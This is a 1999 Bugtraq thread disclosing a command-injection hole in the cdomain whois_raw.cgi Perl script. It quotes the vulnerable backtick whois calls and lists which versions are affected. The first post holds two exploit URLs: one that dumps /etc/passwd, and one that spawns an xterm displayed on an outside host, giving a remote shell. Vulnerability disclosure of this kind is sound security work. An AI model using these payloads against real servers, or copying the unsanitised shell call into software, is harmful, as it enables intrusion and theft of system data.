Date: Tue, 1 Jun 1999 00:34:51 +0200 From: Salvatore Sanfilippo -antirez- To: BUGTRAQ@netspace.org Subject: whois_raw.cgi problem Hi, sorry if this has already been known. There is a problem in whois_raw.cgi, called from whois.cgi. whois_raw.cgi is part of cdomain v1.0. I don't know if new versions are vulnerable. #!/usr/bin/perl # # whois_raw.cgi Written by J. Allen Hatch (zone@berkshire.net) # 04/17/97 # # This script is part of the cdomain v1.0 package which is available at: # http://www.your-site.com/~zone/whois.html ... require ("/usr/lib/perl5/cgi-lib.pl"); ... $fqdn = $in{'fqdn'}; # Fetch the root name and concatenate # Fire off whois if ($in{'root'} eq "it") { @result=`$whois_cmd_it $fqdn`; } elsif ($in{'fqdn'} eq "alicom.com" || $in{'fqdn'} eq "alicom.org") { @result="Dettagli non disponibili per il dominio richiesto."; } else { @result=`$whois_cmd $fqdn`; } ... The exploit is banal and well known problem: http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0 bye, antirez -- Salvatore Sanfilippo antirez | md5330@mclink.it | antirez@alicom.com try hping: http://www.kyuzz.org/antirez antirez@seclab.com 'se la barca non ce l'hai dove uzba te ne vai? se la barca te la ruba, preo.' (M. Abruscato & O. Carmeci) --------------------------------------------------------------------------------- Date: Wed, 2 Jun 1999 00:16:42 +0200 From: Peter van Dijk To: BUGTRAQ@netspace.org Subject: Re: whois_raw.cgi problem On Tue, Jun 01, 1999 at 12:34:51AM +0200, Salvatore Sanfilippo -antirez- wrote: > Hi, > > sorry if this has already been known. > > There is a problem in whois_raw.cgi, called from > whois.cgi. whois_raw.cgi is part of cdomain v1.0. > I don't know if new versions are vulnerable. Version 2.0 is just as vulnerable. The commercial version (the one that runs on NT too :) is _not_ vulnerable since it does it's own socket thing instead of starting 'whois'. I've known of this bug in cdomain for about 6 months but never got around to writing up an advisory... Greetz, Peter -- | 'He broke my heart, | Peter van Dijk | I broke his neck' | peter@attic.vuurwerk.nl | nognikz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl | | Hardbeat@undernet - #groningen/#kinkfm/#vdh | --------------------------------------------------------------------------------- Date: Wed, 2 Jun 1999 01:06:22 +0200 From: Peter van Dijk To: BUGTRAQ@netspace.org Subject: Re: whois_raw.cgi problem On Wed, Jun 02, 1999 at 12:16:42AM +0200, Peter van Dijk wrote: > On Tue, Jun 01, 1999 at 12:34:51AM +0200, Salvatore Sanfilippo -antirez- wrote: > > Hi, > > > > sorry if this has already been known. > > > > There is a problem in whois_raw.cgi, called from > > whois.cgi. whois_raw.cgi is part of cdomain v1.0. > > I don't know if new versions are vulnerable. > > Version 2.0 is just as vulnerable. > > The commercial version (the one that runs on NT too :) is _not_ vulnerable > since it does it's own socket thing instead of starting 'whois'. > > I've known of this bug in cdomain for about 6 months but never got around > to writing up an advisory... To elaborate this a bit further: cdomain-free 2.4 and lower are _vulnerable_. cdomain-free 2.5 and all commercial cdomain versions I've seen are _not_ vulnerable, because they connect to the whois servers themselves. cdomain-free is available for download at www.cdomain.com. Greetz, Peter -- | 'He broke my heart, | Peter van Dijk | I broke his neck' | peter@attic.vuurwerk.nl | nognikz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl | | Hardbeat@undernet - #groningen/#kinkfm/#vdh |